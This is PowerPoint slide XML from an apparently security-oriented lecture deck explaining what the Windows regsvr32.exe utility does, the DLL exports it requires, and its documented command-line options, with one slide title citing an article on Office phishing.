            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Matthew Wetmore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="869693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2492896"/>
            <a:ext cx="8496944" cy="3633267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The genuine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> file is a software component of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>Microsoft Windows Operating System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>Microsoft Corporation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Microsoft's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("Register Server") command line utility, residing in "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\Windows\System32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>", creates and maintains the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> needed for applications to find and link to the Dynamic Link Library (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) modules or ActiveX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) controls required for specific functions. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Component Object Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, "server" means an application that can create COM objects, not network hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a: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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>file.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1471856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In computing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Register Server) is a command-line utility in Microsoft Windows and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2" tooltip="ReactOS"/>
              </a:rPr>
              <a:t>ReactOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for registering and unregistering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Dynamic-link library"/>
              </a:rPr>
              <a:t>DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="ActiveX"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> controls in the operating system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5" tooltip="Windows Registry"/>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="30000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Despite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the suffix "32" in the name of the file, there are both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId6" tooltip="32-bit"/>
              </a:rPr>
              <a:t>32-bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId7" tooltip="64-bit"/>
              </a:rPr>
              <a:t>64-bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> versions of this utility (with identical names, but in different directories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="30000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>requires elevated privileges.</a:t>
            </a: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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2020165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To be used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a DLL must export the functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllRegisterServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllUnregisterServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command is comparable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:hlinkClick r:id="rId2" tooltip="Ldconfig (page does not exist)"/>
              </a:rPr>
              <a:t>ldconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in Linux. </a:t>
            </a:r>
          </a:p>
          <a:p>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Requirements for a DLL Using by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3534577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Word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>很大，你要看一下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Microsoft Office Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>zeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ithome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a: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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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3280603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2675467"/>
            <a:ext cx="8928992" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regSvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>has the following command-line options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[/u] [/n] [/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]] &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dllname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> - Unregister server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
